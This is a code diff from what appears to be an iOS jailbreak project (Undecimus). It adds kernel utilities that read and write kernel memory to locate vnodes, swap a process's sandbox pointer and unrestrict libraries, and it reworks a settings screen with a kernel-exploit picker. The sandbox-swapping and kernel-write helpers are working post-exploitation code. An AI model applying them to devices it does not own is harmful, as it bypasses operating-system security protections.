+    _assert(fd > 0);
+    vnode = get_vnode_for_fd(fd);
+    _assert(KERN_POINTER_VALID(vnode));
+    len = malloc(sizeof(int));
+    _assert(len != NULL);
+    *len = MAXPATHLEN;
+    pathbuf = malloc(*len);
+    _assert(pathbuf != NULL);
+    _assert(vn_getpath(vnode, pathbuf, len) == 0);
+    _assert(strlen(pathbuf) + 1 == *len);
+    ret = strdup(pathbuf);
+out:;
+    if (KERN_POINTER_VALID(vnode)) vnode_put(vnode); vnode = KPTR_NULL;
+    SafeFreeNULL(pathbuf);
+    SafeFreeNULL(len);
+    return ret;
+}
+
 kptr_t get_vnode_for_snapshot(int fd, char *name) {
     kptr_t ret = KPTR_NULL;
-    kptr_t snap_vnode = KPTR_NULL;
-    kptr_t rvpp_ptr = KPTR_NULL;
-    kptr_t sdvpp_ptr = KPTR_NULL;
-    kptr_t ndp_buf = KPTR_NULL;
-    kptr_t sdvpp = KPTR_NULL;
-    kptr_t snap_meta_ptr = KPTR_NULL;
-    kptr_t old_name_ptr = KPTR_NULL;
-    kptr_t ndp_old_name = KPTR_NULL;
-    rvpp_ptr = smalloc(sizeof(kptr_t));
+    kptr_t snap_vnode, rvpp_ptr, sdvpp_ptr, ndp_buf, sdvpp, snap_meta_ptr, old_name_ptr, ndp_old_name;
+    snap_vnode = rvpp_ptr = sdvpp_ptr = ndp_buf = sdvpp = snap_meta_ptr = old_name_ptr = ndp_old_name = KPTR_NULL;
+    size_t rvpp_ptr_size, sdvpp_ptr_size, ndp_buf_size, snap_meta_ptr_size, old_name_ptr_size;
+    ndp_buf_size = 816;
+    rvpp_ptr_size = sdvpp_ptr_size = snap_meta_ptr_size = old_name_ptr_size = sizeof(kptr_t);
+    rvpp_ptr = IOMalloc(rvpp_ptr_size);
     _assert(KERN_POINTER_VALID(rvpp_ptr));
-    sdvpp_ptr = smalloc(sizeof(kptr_t));
+    sdvpp_ptr = IOMalloc(sdvpp_ptr_size);
     _assert(KERN_POINTER_VALID(sdvpp_ptr));
-    ndp_buf = smalloc(816);
+    ndp_buf = IOMalloc(ndp_buf_size);
     _assert(KERN_POINTER_VALID(ndp_buf));
     kptr_t const vfs_context = vfs_context_current();
     _assert(KERN_POINTER_VALID(vfs_context));
@@ -1604,9 +1719,9 @@ kptr_t get_vnode_for_snapshot(int fd, char *name) {
     _assert(KERN_POINTER_VALID(sdvpp_v_mount));
     kptr_t const sdvpp_v_mount_mnt_data = ReadKernel64(sdvpp_v_mount + koffset(KSTRUCT_OFFSET_MOUNT_MNT_DATA));
     _assert(KERN_POINTER_VALID(sdvpp_v_mount_mnt_data));
-    snap_meta_ptr = smalloc(sizeof(kptr_t));
+    snap_meta_ptr = IOMalloc(snap_meta_ptr_size);
     _assert(KERN_POINTER_VALID(snap_meta_ptr));
-    old_name_ptr = smalloc(sizeof(kptr_t));
+    old_name_ptr = IOMalloc(old_name_ptr_size);
     _assert(KERN_POINTER_VALID(old_name_ptr));
     ndp_old_name = ReadKernel64(ndp_buf + 336 + 40);
     _assert(KERN_POINTER_VALID(ndp_old_name));
@@ -1620,10 +1735,10 @@ kptr_t get_vnode_for_snapshot(int fd, char *name) {
     ret = snap_vnode;
 out:
     if (KERN_POINTER_VALID(sdvpp)) vnode_put(sdvpp); sdvpp = KPTR_NULL;
-    SafeSFreeNULL(sdvpp_ptr);
-    SafeSFreeNULL(ndp_buf);
-    SafeSFreeNULL(snap_meta_ptr);
-    SafeSFreeNULL(old_name_ptr);
+    SafeIOFreeNULL(sdvpp_ptr, sdvpp_ptr_size);
+    SafeIOFreeNULL(ndp_buf, ndp_buf_size);
+    SafeIOFreeNULL(snap_meta_ptr, snap_meta_ptr_size);
+    SafeIOFreeNULL(old_name_ptr, old_name_ptr_size);
     return ret;
 }
 
@@ -1671,7 +1786,7 @@ bool set_kernel_task_info() {
     _assert(task_dyld_info->all_image_info_size == kernel_slide);
     ret = true;
 out:;
-    if (!ret && KERN_POINTER_VALID(kernel_cache_blob)) kmem_free(kernel_cache_blob, cache_size); kernel_cache_blob = KPTR_NULL;
+    if (!ret && KERN_POINTER_VALID(kernel_cache_blob)) SafeIOFreeNULL(kernel_cache_blob, cache_size);
     SafeFreeNULL(task_dyld_info);
     SafeFreeNULL(task_dyld_info_count);
     SafeFreeNULL(cache);
@@ -1963,6 +2078,28 @@ out:;
     return ret;
 }
 
+bool unrestrict_library(const char *path) {
+    bool ret = false;
+    _assert(path != NULL);
+    _assert(enable_mapping_for_library(path));
+    ret = true;
+out:;
+    return ret;
+}
+
+bool unrestrict_library_with_fd(int fd) {
+    bool ret = false;
+    char *path = NULL;
+    _assert(fd > 0);
+    path = get_path_for_fd(fd);
+    _assert(path != NULL);
+    _assert(unrestrict_library(path));
+    ret = true;
+out:;
+    SafeFreeNULL(path);
+    return ret;
+}
+
 bool revalidate_process(pid_t pid) {
     bool ret = true;
     kptr_t proc = KPTR_NULL;
@@ -2044,3 +2181,50 @@ out:;
     CFSafeReleaseNULL(folder);
     return ret;
 }
+
+kptr_t find_vnode_with_fd(kptr_t proc, int fd) {
+    kptr_t ret = KPTR_NULL;
+    _assert(fd > 0);
+    _assert(KERN_POINTER_VALID(proc));
+    kptr_t fdp = ReadKernel64(proc + koffset(KSTRUCT_OFFSET_PROC_P_FD));
+    _assert(KERN_POINTER_VALID(fdp));
+    kptr_t ofp = ReadKernel64(fdp + koffset(KSTRUCT_OFFSET_FILEDESC_FD_OFILES));
+    _assert(KERN_POINTER_VALID(ofp));
+    kptr_t fpp = ReadKernel64(ofp + (fd * sizeof(kptr_t)));
+    _assert(KERN_POINTER_VALID(fpp));
+    kptr_t fgp = ReadKernel64(fpp + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));
+    _assert(KERN_POINTER_VALID(fgp));
+    kptr_t vnode = ReadKernel64(fgp + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));
+    _assert(KERN_POINTER_VALID(vnode));
+    ret = vnode;
+out:;
+    return ret;
+}
+
+kptr_t find_vnode_with_path(const char *path) {
+    kptr_t ret = KPTR_NULL;
+    int fd = 0;
+    _assert(path != NULL);
+    kptr_t const proc = proc_struct_addr();
+    _assert(KERN_POINTER_VALID(proc));
+    fd = open(path, O_RDONLY);
+    ret = find_vnode_with_fd(proc, fd);
+out:;
+    if (fd > 0) close(fd); fd = 0;
+    return ret;
+}
+
+kptr_t swap_sandbox_for_proc(kptr_t proc, kptr_t sandbox) {
+    kptr_t ret = KPTR_NULL;
+    _assert(KERN_POINTER_VALID(proc));
+    kptr_t const ucred = ReadKernel64(proc + koffset(KSTRUCT_OFFSET_PROC_UCRED));
+    _assert(KERN_POINTER_VALID(ucred));
+    kptr_t const cr_label = ReadKernel64(ucred + koffset(KSTRUCT_OFFSET_UCRED_CR_LABEL));
+    _assert(KERN_POINTER_VALID(cr_label));
+    kptr_t const sandbox_addr = cr_label + 0x8 + 0x8;
+    kptr_t const current_sandbox = ReadKernel64(sandbox_addr);
+    _assert(WriteKernel64(sandbox_addr, sandbox));
+    ret = current_sandbox;
+out:;
+    return ret;
+}

Undecimus/source/KernelUtilities.h

@@ -92,6 +92,8 @@ size_t kstrlen(kptr_t ptr);
 kptr_t sstrdup(const char *str);
 kptr_t smalloc(size_t size);
 void sfree(kptr_t ptr);
+kptr_t IOMalloc(vm_size_t size);
+void IOFree(kptr_t address, vm_size_t size);
 int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype);
 int extension_create_mach(kptr_t saveto, kptr_t sb, const char *name, uint32_t subtype);
 int extension_add(kptr_t ext, kptr_t sb, const char *desc);
@@ -115,6 +117,8 @@ void kauth_cred_unref(kptr_t cred);
 int chgproccnt(uid_t uid, int diff);
 kptr_t vfs_context_current(void);
 int vnode_lookup(const char *path, int flags, kptr_t *vpp, kptr_t ctx);
+int vnode_getfromfd(kptr_t ctx, int fd, kptr_t *vpp);
+int vn_getpath(kptr_t vp, char *pathbuf, int *len);
 int vnode_put(kptr_t vp);
 bool OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
 kptr_t OSDictionary_GetItem(kptr_t OSDictionary, const char *key);
@@ -157,14 +161,21 @@ kptr_t make_fake_task(kptr_t vm_map);
 bool make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
 bool set_hsp4(task_t port);
 kptr_t get_vnode_for_path(const char *path);
+kptr_t get_vnode_for_fd(int fd);
+char *get_path_for_fd(int fd);
 kptr_t get_vnode_for_snapshot(int fd, char *name);
 bool set_kernel_task_info(void);
 int issue_extension_for_mach_service(kptr_t sb, kptr_t ctx, const char *entry_name, void *desc);
 bool unrestrict_process(pid_t pid);
 bool unrestrict_process_with_task_port(task_t task_port);
+bool unrestrict_library(const char *path);
+bool unrestrict_library_with_fd(int fd);
 bool revalidate_process(pid_t pid);
 bool revalidate_process_with_task_port(task_t task_port);
 bool enable_mapping_for_library(const char *lib);
 bool enable_mapping_for_libraries(const char *libs);
+kptr_t find_vnode_with_fd(kptr_t proc, int fd);
+kptr_t find_vnode_with_path(const char *path);
+kptr_t swap_sandbox_for_proc(kptr_t proc, kptr_t sandbox);
 
 #endif /* kutils_h */

Undecimus/source/SettingsTableViewController.h

@@ -10,35 +10,92 @@
 #import "common.h"
 #import "utils.h"
 
-@interface SettingsTableViewController : UITableViewController <UITextFieldDelegate>
-@property (weak, nonatomic) IBOutlet UISwitch *TweakInjectionSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *LoadDaemonsSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *DumpAPTicketSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *RefreshIconCacheSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *BootNonceTextField;
-@property (weak, nonatomic) IBOutlet UISegmentedControl *KernelExploitSegmentedControl;
+@interface SettingsTableViewController : UITableViewController  <UITextFieldDelegate, UIPickerViewDataSource, UIPickerViewDelegate>
+@property (weak, nonatomic) IBOutlet UISwitch *tweakInjectionSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *loadDaemonsSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *dumpAPTicketSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *refreshIconCacheSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *bootNonceTextField;
+@property (weak, nonatomic) IBOutlet UITextField *kernelExploitTextField;
+@property (nonatomic) UIPickerView *kernelExploitPickerView;
+@property (nonatomic) NSMutableArray *exploitPickerArray;
+@property (nonatomic) NSMutableDictionary *availableExploits;
+@property (nonatomic) UIToolbar *exploitPickerToolbar;
+@property (weak, nonatomic) IBOutlet UITextField *codeSubstitutorTextField;
+@property (nonatomic) UIPickerView *codeSubstitutorPickerView;
+@property (nonatomic) NSMutableArray *substitutorPickerArray;
+@property (nonatomic) NSMutableDictionary *availableSubstitutors;
+@property (nonatomic) UIToolbar *substitutorPickerToolbar;
+@property (nonatomic) BOOL isPicking;
 @property (weak, nonatomic) IBOutlet UIButton *restartButton;
-@property (weak, nonatomic) IBOutlet UISwitch *DisableAutoUpdatesSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *DisableAppRevokesSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *disableAutoUpdatesSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *disableAppRevokesSwitch;
 @property (nonatomic) UITapGestureRecognizer *tap;
-@property (weak, nonatomic) IBOutlet UIButton *ShareDiagnosticsDataButton;
-@property (weak, nonatomic) IBOutlet UIButton *OpenCydiaButton;
-@property (weak, nonatomic) IBOutlet UITextField *ExpiryLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *OverwriteBootNonceSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *ExportKernelTaskPortSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *RestoreRootFSSwitch;
+@property (weak, nonatomic) IBOutlet UIButton *shareDiagnosticsDataButton;
+@property (weak, nonatomic) IBOutlet UIButton *openCydiaButton;
+@property (weak, nonatomic) IBOutlet UITextField *expiryLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *overwriteBootNonceSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *exportKernelTaskPortSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *restoreRootFSSwitch;
 @property (weak, nonatomic) IBOutlet UISwitch *installCydiaSwitch;
 @property (weak, nonatomic) IBOutlet UISwitch *installSSHSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *UptimeLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *IncreaseMemoryLimitSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *ECIDLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *ReloadSystemDaemonsSwitch;
-@property (weak, nonatomic) IBOutlet UIButton *RestartSpringBoardButton;
-@property (weak, nonatomic) IBOutlet UISwitch *HideLogWindowSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *ResetCydiaCacheSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *SSHOnlySwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *EnableGetTaskAllowSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *SetCSDebuggedSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *uptimeLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *increaseMemoryLimitSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *ecidLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *reloadSystemDaemonsSwitch;
+@property (weak, nonatomic) IBOutlet UIButton *restartSpringBoardButton;
+@property (weak, nonatomic) IBOutlet UISwitch *hideLogWindowSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *resetCydiaCacheSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *sshOnlySwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *enableGetTaskAllowSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *setCSDebuggedSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *autoRespringSwitch;
+
+@property (weak, nonatomic) IBOutlet UILabel *specialThanksLabel;
+@property (weak, nonatomic) IBOutlet UILabel *tweakInjectionLabel;
+@property (weak, nonatomic) IBOutlet UILabel *loadDaemonsLabel;
+@property (weak, nonatomic) IBOutlet UILabel *dumpAPTicketLabel;
+@property (weak, nonatomic) IBOutlet UILabel *refreshIconCacheLabel;
+@property (weak, nonatomic) IBOutlet UILabel *disableAutoUpdatesLabel;
+@property (weak, nonatomic) IBOutlet UILabel *disableAppRevokesLabel;
+@property (weak, nonatomic) IBOutlet UILabel *overwriteBootNonceLabel;
+@property (weak, nonatomic) IBOutlet UILabel *exportKernelTaskPortLabel;
+@property (weak, nonatomic) IBOutlet UILabel *restoreRootFSLabel;
+@property (weak, nonatomic) IBOutlet UILabel *installCydiaLabel;
+@property (weak, nonatomic) IBOutlet UILabel *installSSHLabel;
+@property (weak, nonatomic) IBOutlet UILabel *increaseMemoryLimitLabel;
+@property (weak, nonatomic) IBOutlet UILabel *reloadSystemDaemonsLabel;
+@property (weak, nonatomic) IBOutlet UILabel *hideLogWindowLabel;
+@property (weak, nonatomic) IBOutlet UILabel *resetCydiaCacheLabel;
+@property (weak, nonatomic) IBOutlet UILabel *sshOnlyLabel;
+@property (weak, nonatomic) IBOutlet UILabel *enableGetTaskAllowLabel;
+@property (weak, nonatomic) IBOutlet UILabel *setCSDebuggedLabel;
+@property (weak, nonatomic) IBOutlet UILabel *autoRespringLabel;
+@property (weak, nonatomic) IBOutlet UILabel *kernelExploitLabel;
+@property (weak, nonatomic) IBOutlet UILabel *codeSubstitutorLabel;
+@property (weak, nonatomic) IBOutlet UIButton *bootNonceButton;
+@property (weak, nonatomic) IBOutlet UIButton *ecidDarkModeButton;
+@property (weak, nonatomic) IBOutlet UILabel *expiryDarkModeLabel;
+@property (weak, nonatomic) IBOutlet UILabel *upTimeLabel;
+@property (weak, nonatomic) IBOutlet UIButton *loadTweaksInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *loadDaemonsInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *dumpAPTicketInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *refreshIconCacheInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *disableAutoUpdatesInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *disableAppRevokesInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *overwriteBootNonceInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *exportKernelTaskPortInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *restoreRootFSInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *increaseMemoryLimitInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *installSSHInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *installCydiaInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *reloadSystemDaemonsInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *hideLogWindowInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *resetCydiaSwitchInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *sshOnlyInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *enableGetTaskAllowInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *setCSDebuggedInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *autoRespringInfoButton;
 
 + (NSDictionary *)provisioningProfileAtPath:(NSString *)path;
 

Undecimus/source/SettingsTableViewController.m

@@ -46,24 +46,158 @@
 
 - (void)viewDidLoad {
     [super viewDidLoad];
-    UIImageView *const myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
-    [myImageView setContentMode:UIViewContentModeScaleAspectFill];
-    [myImageView setFrame:self.tableView.frame];
-    UIView *const myView = [[UIView alloc] initWithFrame:myImageView.frame];
-    [myView setBackgroundColor:[UIColor whiteColor]];
-    [myView setAlpha:0.84];
-    [myView setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
-    [myImageView addSubview:myView];
-    [self.tableView setBackgroundView:myImageView];
-    [self.BootNonceTextField setDelegate:self];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(darkModeSettings:) name:@"darkModeSettings" object:nil];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(lightModeSettings:) name:@"lightModeSettings" object:nil];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(dismissKeyboardFromDoneButton:) name:@"dismissKeyboard" object:nil];
+    [self.bootNonceTextField setDelegate:self];
+    [self.bootNonceTextField setAutocorrectionType:UITextAutocorrectionTypeNo];
+    [self.kernelExploitTextField setDelegate:self];
     self.tap = [[UITapGestureRecognizer alloc] initWithTarget:self action:@selector(userTappedAnyware:)];
     self.tap.cancelsTouchesInView = NO;
     [self.view addGestureRecognizer:self.tap];
+    self.exploitPickerArray = [NSMutableArray new];
+    self.availableExploits = [NSMutableDictionary new];
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != jailbreak_capability) {
+            continue;
+        }
+        [_exploitPickerArray addObject:@(exploit_infos[i]->name)];
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        [_availableExploits addEntriesFromDictionary:@{@(exploit_infos[i]->name) : @(exploit_infos[i]->exploit)}];
+    }
+    self.substitutorPickerArray = [NSMutableArray new];
+    self.availableSubstitutors = [NSMutableDictionary new];
+    for (size_t i = 0; substitutor_infos[i]; i++) {
+        [_substitutorPickerArray addObject:@(substitutor_infos[i]->name)];
+        if (!checkDeviceSupport(substitutor_infos[i]->device_support_info)) {
+            continue;
+        }
+        [_availableSubstitutors addEntriesFromDictionary:@{@(substitutor_infos[i]->name) : @(substitutor_infos[i]->substitutor)}];
+    }
+    self.kernelExploitPickerView = [[UIPickerView alloc] init];
+    [self.kernelExploitPickerView setDataSource:self];
+    [self.kernelExploitPickerView setDelegate:self];
+    self.codeSubstitutorPickerView = [[UIPickerView alloc] init];
+    [self.codeSubstitutorPickerView setDataSource:self];
+    [self.codeSubstitutorPickerView setDelegate:self];
+    [self.kernelExploitTextField setInputView:_kernelExploitPickerView];
+    [self.codeSubstitutorTextField setInputView:_codeSubstitutorPickerView];
+    self.exploitPickerToolbar = [[UIToolbar alloc] initWithFrame:CGRectMake(0, 0, 320, 56)];
+    [self.exploitPickerToolbar setBarStyle:UIBarStyleDefault];
+    [self.exploitPickerToolbar sizeToFit];
+    self.substitutorPickerToolbar = [[UIToolbar alloc] initWithFrame:CGRectMake(0, 0, 320, 56)];
+    [self.substitutorPickerToolbar setBarStyle:UIBarStyleDefault];
+    [self.substitutorPickerToolbar sizeToFit];
+    UIBarButtonItem *exploitPickerAlignRight = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemFlexibleSpace target:self action:nil];
+    UIBarButtonItem *exploitPickerDoneButtonItem = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemDone target:self action:@selector(exploitPickerDoneAction)];
+    [self.exploitPickerToolbar setItems:[NSArray arrayWithObjects:exploitPickerAlignRight, exploitPickerDoneButtonItem, nil] animated:NO];
+    [self.kernelExploitTextField setInputAccessoryView:_exploitPickerToolbar];
+    UIBarButtonItem *substitutorPickerAlignRight = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemFlexibleSpace target:self action:nil];
+    UIBarButtonItem *substitutorPickerDoneButtonItem = [[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemDone target:self action:@selector(substitutorPickerDoneAction)];
+    [self.substitutorPickerToolbar setItems:[NSArray arrayWithObjects:substitutorPickerAlignRight, substitutorPickerDoneButtonItem, nil] animated:NO];
+    [self.codeSubstitutorTextField setInputAccessoryView:_substitutorPickerToolbar];
+    self.isPicking = NO;
+}
+
+-(void)dismissKeyboardFromDoneButton:(NSNotification *) notification {
+    [self.view endEditing:YES];
+}
+
+-(void)darkModeSettings:(NSNotification *) notification  {
+    [self.specialThanksLabel setTextColor:[UIColor whiteColor]];
+    [self.tweakInjectionLabel setTextColor:[UIColor whiteColor]];
+    [self.loadDaemonsLabel setTextColor:[UIColor whiteColor]];
+    [self.dumpAPTicketLabel setTextColor:[UIColor whiteColor]];
+    [self.refreshIconCacheLabel setTextColor:[UIColor whiteColor]];
+    [self.disableAutoUpdatesLabel setTextColor:[UIColor whiteColor]];
+    [self.disableAppRevokesLabel setTextColor:[UIColor whiteColor]];
+    [self.overwriteBootNonceLabel setTextColor:[UIColor whiteColor]];
+    [self.exportKernelTaskPortLabel setTextColor:[UIColor whiteColor]];
+    [self.restoreRootFSLabel setTextColor:[UIColor whiteColor]];
+    [self.installCydiaLabel setTextColor:[UIColor whiteColor]];
+    [self.installSSHLabel setTextColor:[UIColor whiteColor]];
+    [self.increaseMemoryLimitLabel setTextColor:[UIColor whiteColor]];
+    [self.reloadSystemDaemonsLabel setTextColor:[UIColor whiteColor]];
+    [self.hideLogWindowLabel setTextColor:[UIColor whiteColor]];
+    [self.resetCydiaCacheLabel setTextColor:[UIColor whiteColor]];
+    [self.sshOnlyLabel setTextColor:[UIColor whiteColor]];
+    [self.enableGetTaskAllowLabel setTextColor:[UIColor whiteColor]];
+    [self.setCSDebuggedLabel setTextColor:[UIColor whiteColor]];
+    [self.autoRespringLabel setTextColor:[UIColor whiteColor]];
+    [self.kernelExploitLabel setTextColor:[UIColor whiteColor]];
+    [self.codeSubstitutorLabel setTextColor:[UIColor whiteColor]];
+    [self.bootNonceButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.bootNonceTextField setTintColor:[UIColor whiteColor]];
+    [self.bootNonceTextField setTextColor:[UIColor whiteColor]];
+    [self.kernelExploitTextField setTintColor:[UIColor whiteColor]];
+    [self.codeSubstitutorTextField setTintColor:[UIColor whiteColor]];
+    [self.bootNonceTextField setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.kernelExploitTextField setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.codeSubstitutorTextField setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidLabel setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidDarkModeButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.expiryDarkModeLabel setTextColor:[UIColor whiteColor]];
+    [self.expiryLabel setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.uptimeLabel setValue:[UIColor darkGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.upTimeLabel setTextColor:[UIColor whiteColor]];
+    [self.exploitPickerToolbar setBarTintColor:[UIColor darkTextColor]];
+    [self.substitutorPickerToolbar setBarTintColor:[UIColor darkTextColor]];
+    [self.kernelExploitPickerView setBackgroundColor:[UIColor blackColor]];
+    [self.codeSubstitutorPickerView setBackgroundColor:[UIColor blackColor]];
+    [JailbreakViewController.sharedController.navigationController.navigationBar setLargeTitleTextAttributes:@{ NSForegroundColorAttributeName : [UIColor whiteColor] }];
+}
+
+-(void)lightModeSettings:(NSNotification *) notification  {
+    [self.specialThanksLabel setTextColor:[UIColor blackColor]];
+    [self.tweakInjectionLabel setTextColor:[UIColor blackColor]];
+    [self.loadDaemonsLabel setTextColor:[UIColor blackColor]];
+    [self.dumpAPTicketLabel setTextColor:[UIColor blackColor]];
+    [self.refreshIconCacheLabel setTextColor:[UIColor blackColor]];
+    [self.disableAutoUpdatesLabel setTextColor:[UIColor blackColor]];
+    [self.disableAppRevokesLabel setTextColor:[UIColor blackColor]];
+    [self.overwriteBootNonceLabel setTextColor:[UIColor blackColor]];
+    [self.exportKernelTaskPortLabel setTextColor:[UIColor blackColor]];
+    [self.restoreRootFSLabel setTextColor:[UIColor blackColor]];
+    [self.installCydiaLabel setTextColor:[UIColor blackColor]];
+    [self.installSSHLabel setTextColor:[UIColor blackColor]];
+    [self.increaseMemoryLimitLabel setTextColor:[UIColor blackColor]];
+    [self.reloadSystemDaemonsLabel setTextColor:[UIColor blackColor]];
+    [self.hideLogWindowLabel setTextColor:[UIColor blackColor]];
+    [self.resetCydiaCacheLabel setTextColor:[UIColor blackColor]];
+    [self.sshOnlyLabel setTextColor:[UIColor blackColor]];
+    [self.enableGetTaskAllowLabel setTextColor:[UIColor blackColor]];
+    [self.setCSDebuggedLabel setTextColor:[UIColor blackColor]];
+    [self.autoRespringLabel setTextColor:[UIColor blackColor]];
+    [self.kernelExploitLabel setTextColor:[UIColor blackColor]];
+    [self.codeSubstitutorLabel setTextColor:[UIColor blackColor]];
+    [self.bootNonceButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.bootNonceTextField setTintColor:[UIColor blackColor]];
+    [self.bootNonceTextField setTextColor:[UIColor blackColor]];
+    [self.kernelExploitTextField setTintColor:[UIColor blackColor]];
+    [self.codeSubstitutorTextField setTintColor:[UIColor blackColor]];
+    [self.bootNonceTextField setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.kernelExploitTextField setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.codeSubstitutorTextField setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidLabel setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.ecidDarkModeButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.expiryDarkModeLabel setTextColor:[UIColor blackColor]];
+    [self.expiryLabel setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.uptimeLabel setValue:[UIColor lightGrayColor] forKeyPath:@"_placeholderLabel.textColor"];
+    [self.upTimeLabel setTextColor:[UIColor blackColor]];
+    [self.exploitPickerToolbar setBarTintColor:[UIColor lightTextColor]];
+    [self.substitutorPickerToolbar setBarTintColor:[UIColor lightTextColor]];
+    [self.kernelExploitPickerView setBackgroundColor:[UIColor whiteColor]];
+    [self.codeSubstitutorPickerView setBackgroundColor:[UIColor whiteColor]];
+    [JailbreakViewController.sharedController.navigationController.navigationBar setLargeTitleTextAttributes:@{ NSForegroundColorAttributeName : [UIColor blackColor] }];
 }
 
 - (void)userTappedAnyware:(UITapGestureRecognizer *) sender
 {
-    [self.view endEditing:YES];
+    if (!self.isPicking){
+        [self.view endEditing:YES];
+    }
 }
 
 - (BOOL)textFieldShouldReturn:(UITextField *)textField {
@@ -73,70 +207,93 @@
 
 - (void)reloadData {
     prefs_t *prefs = copy_prefs();
-    [self.TweakInjectionSwitch setOn:(BOOL)prefs->load_tweaks];
-    [self.LoadDaemonsSwitch setOn:(BOOL)prefs->load_daemons];
-    [self.DumpAPTicketSwitch setOn:(BOOL)prefs->dump_apticket];
-    [self.BootNonceTextField setPlaceholder:@(prefs->boot_nonce)];
-    [self.BootNonceTextField setText:nil];
-    [self.RefreshIconCacheSwitch setOn:(BOOL)prefs->run_uicache];
-    [self.KernelExploitSegmentedControl setSelectedSegmentIndex:(int)prefs->exploit];
-    [self.DisableAutoUpdatesSwitch setOn:(BOOL)prefs->disable_auto_updates];
-    [self.DisableAppRevokesSwitch setOn:(BOOL)prefs->disable_app_revokes];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(empty_list_exploit) forSegmentAtIndex:empty_list_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(multi_path_exploit) forSegmentAtIndex:multi_path_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(async_wake_exploit) forSegmentAtIndex:async_wake_exploit];
